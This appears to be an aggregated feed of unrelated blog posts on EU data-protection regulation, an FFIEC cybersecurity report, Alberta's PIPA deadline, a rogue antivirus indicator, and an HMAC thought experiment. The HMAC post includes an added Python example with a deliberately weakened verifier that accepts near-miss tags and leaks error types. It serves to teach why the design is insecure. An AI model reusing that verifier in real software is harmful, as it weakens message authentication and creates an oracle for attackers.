In the article, Jay argues that the currently endangered one-stop-shop arrangements under the Regulation can be rescued and made effective by the adoption of a more flexible and balanced methodology. Under the current text of the Regulation, a data controller with operations in more than one EU Member State will be subject to the lead supervision of the regulatory authority for the Member State in which it has its “main establishment.” This raises concerns that (1) regulatory authorities without lead supervision may lose influence over data protection issues that affect citizens in their Member States, (2) the regulatory authority with lead supervision may be removed from individuals affected by the data controller’s processing activities, (3) businesses may “forum shop” to obtain their preferred lead regulatory authority and (4) orders by lead regulatory authorities may be unenforceable in other Member States. Jay addresses these issues simply and effectively by making the one-stop-shop elective rather than automatic, and more tailored to specific business models.

In an elective system, a business must apply for a lead regulatory authority. To have its application approved, the business must represent that it will comply with the lead regulatory authority’s orders across its businesses in all EU Member States. The application process also could involve discussions with non-lead regulatory authorities and incorporate specific arrangements to resolve their reservations or concerns. The one-stop-shop could be implemented gradually to accumulate experience and facilitate a more streamlined application process as implementation of the one-stop-shop progresses.

When launching the Regulation, the European Commission indicated that the one-stop-shop would benefit businesses operating among several EU Member States. Those working in privacy and data protection across Europe are hopeful that the Working Party’s deliberations can rescue the one-stop-shop concept to realize the benefits previously announced by the European Commission.

FFIEC Announces Plans to Update Cybersecurity Guidance in Wake of Cybersecurity Assessments

On November 3, 2014, the Federal Financial Institutions Examination Council (“FFIEC”), on behalf of its members, released a report entitled FFIEC Cybersecurity Assessment General Observations (the “Report”) that contains observations from recent cybersecurity assessments conducted at over 500 community financial institutions as part of the FFIEC cybersecurity examination work program. The Report summarizes themes from the assessments and provides suggested questions for chief executive officers and boards of directors to ask when assessing their institutions’ cybersecurity preparedness. In light of the assessments, the FFIEC announced that its members will review and update current FFIEC cybersecurity guidance.

Based on the assessments, the FFIEC observed that the level of cybersecurity inherent risk varies significantly across financial institutions, in part due to the various types of network connections, products and services, and technologies used by financial institutions. The Report also contains observations on the overall cybersecurity preparedness of financial institutions, including findings on the current risk management, governance, threat intelligence, cybersecurity controls, incident response, and third party management practices of financial institutions.

Additionally, the FFIEC emphasized the importance of information sharing, noting that “[p]articipating in information sharing forums (e.g., Financial Services Information Sharing and Analysis Center) is an important element of a financial institution’s risk management processes and its ability to identify, respond to, and mitigate cybersecurity threats and incidents.” The FFIEC also recommended in a separate statement that financial institutions of all sizes participate in the Financial Services Information Sharing and Analysis Center as part of their process to identify, respond to, and mitigate cybersecurity threats and vulnerabilities.

Thought experiment on protocols and noise

I hesitate to call this an interview question because I don’t think on-the-spot puzzle solving equates to a good engineering hire. On the other hand, I try to explore some simple thought experiments with candidates that have a security background.

One of these involves a protocol that has messages authenticated by an HMAC. There’s a message (with appropriate internal format) and a SHA-256 HMAC that covers it. As the implementer, you receive a message that doesn’t verify. In other words, your calculated MAC isn’t the same as the one in the message. What do you do?

“Throw an error” is a common response. But is there something more clever you could do? What if you could tell whether the message had been tampered with or if this was an innocent network error due to noise? How could you do that?

Some come up with the idea of calculating the Hamming distance (or some other closeness measure) between the computed HMAC and the one in the message. If the two are close, it is unlikely that the message itself was corrupted: the avalanche property of a secure hash function means any change to the message flips roughly half of the MAC bits, so a near miss points to noise in the MAC field. If they are far apart, the message itself may have suffered a bit flip, possibly due to an attack.

OK, so you can distinguish between a small number of errors in the MAC and errors in the message itself. Is this helpful, and is it secure? Consider:

  • If you return an error, which one do you return? At what point in the processing?
  • Does knowing which type of error occurred help an attacker? Which kind of attacker?
  • If you chose to allow up to 8 flipped bits in the MAC while still accepting the message, is that secure? If so, at what number of bits would it be insecure? Does the position of the bits matter?

There comes a moment when every engineer comes up with some “clever” idea like the above. If she’s had experience attacking crypto, the next thought is one of intense unease. The unschooled engineer has no such qualms, and thus provides full employment for Root Labs.
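As an added illustration of the thought experiment above (this is not code from the original post), the strict verifier is placed beside the "clever" tolerant one, and the cost of the tolerance is measured: a verifier that accepts any tag within t bits of the true HMAC accepts sum(C(256, k), k <= t) tags per message instead of one, which is exactly the attacker's gain on a random forgery. The key and messages are constructed sample values.

```python
import hashlib
import hmac
import math

KEY = b"constructed-demo-key"  # constructed sample key, not from the post
TAG_BITS = 256                  # SHA-256 HMAC output length

def tag(key: bytes, msg: bytes) -> bytes:
    """SHA-256 HMAC over the message, as in the protocol described in the post."""
    return hmac.new(key, msg, hashlib.sha256).digest()

def hamming(a: bytes, b: bytes) -> int:
    """Number of differing bits between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

def verify_strict(key: bytes, msg: bytes, received: bytes) -> bool:
    """The plain answer: constant-time equality; accept or reject, nothing else leaks."""
    return hmac.compare_digest(tag(key, msg), received)

def classify_tolerant(key: bytes, msg: bytes, received: bytes, max_flips: int = 8) -> str:
    """The 'clever' answer: accept tags within max_flips bits and report whether a
    mismatch looks like MAC noise or message tampering. Written only to measure
    what the tolerance costs; the distinct results are themselves an oracle."""
    d = hamming(tag(key, msg), received)
    if d == 0:
        return "ok"
    if d <= max_flips:
        return "accepted-noisy-mac"
    return "message-tampered-or-far"

def forgery_advantage_bits(max_flips: int, n: int = TAG_BITS) -> float:
    """log2 of how many n-bit tags the tolerant verifier accepts for one message.
    A random forgery then succeeds with probability 2 ** (advantage - n) instead
    of 2 ** -n, so the effective tag strength is n minus this value."""
    accepted = sum(math.comb(n, k) for k in range(max_flips + 1))
    return math.log2(accepted)

def flip_bits(data: bytes, positions) -> bytes:
    """Return a copy of data with the given bit positions flipped (simulated noise)."""
    out = bytearray(data)
    for i in positions:
        out[i // 8] ^= 1 << (i % 8)
    return bytes(out)
```

For t = 8 the accepted set is about 2^48.6 tags, so the tolerant verifier gives up roughly 49 bits of the 256; the position of the flipped bits does not matter for this count, but it does matter for any error message that reveals the distance.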

Supreme Court of Canada Extends Deadline for Amending Alberta PIPA

On October 30, 2014, the Supreme Court of Canada extended the deadline for the province of Alberta to amend its Personal Information Protection Act (“PIPA”). In November 2013, the Supreme Court of Canada declared PIPA invalid because it interfered with the right to freedom of expression in the labor context under Section 2(b) of the Canadian Charter of Rights and Freedoms. The Supreme Court of Canada gave the Alberta legislature 12 months to determine how to make the legislation constitutionally compliant, which it apparently failed to do. The new deadline for amending PIPA is May 2015.

Alberta’s Information and Privacy Commissioner Jill Clayton applauded the extension of the deadline. Commissioner Clayton had sent a letter to Alberta’s Premier, Minister of Justice and Solicitor General, and Minister of Service in September 2014 expressing her concern that the Alberta legislature would “not be able to act to preserve PIPA before it lapses.” She also highlighted the “unique benefits” of PIPA in the letter, including breach notification to affected individuals, local enforcement without the involvement of courts, and the protection of employee privacy rights.

Spyware Defender

Spyware Defender is a fake antivirus tool. It reports nonexistent infections and displays alert messages to scare users into installing the program and buying a license for the rogue.

It contacts spyware-defender.com (212.7.218.11).
Thanks to @kafeine for the sample.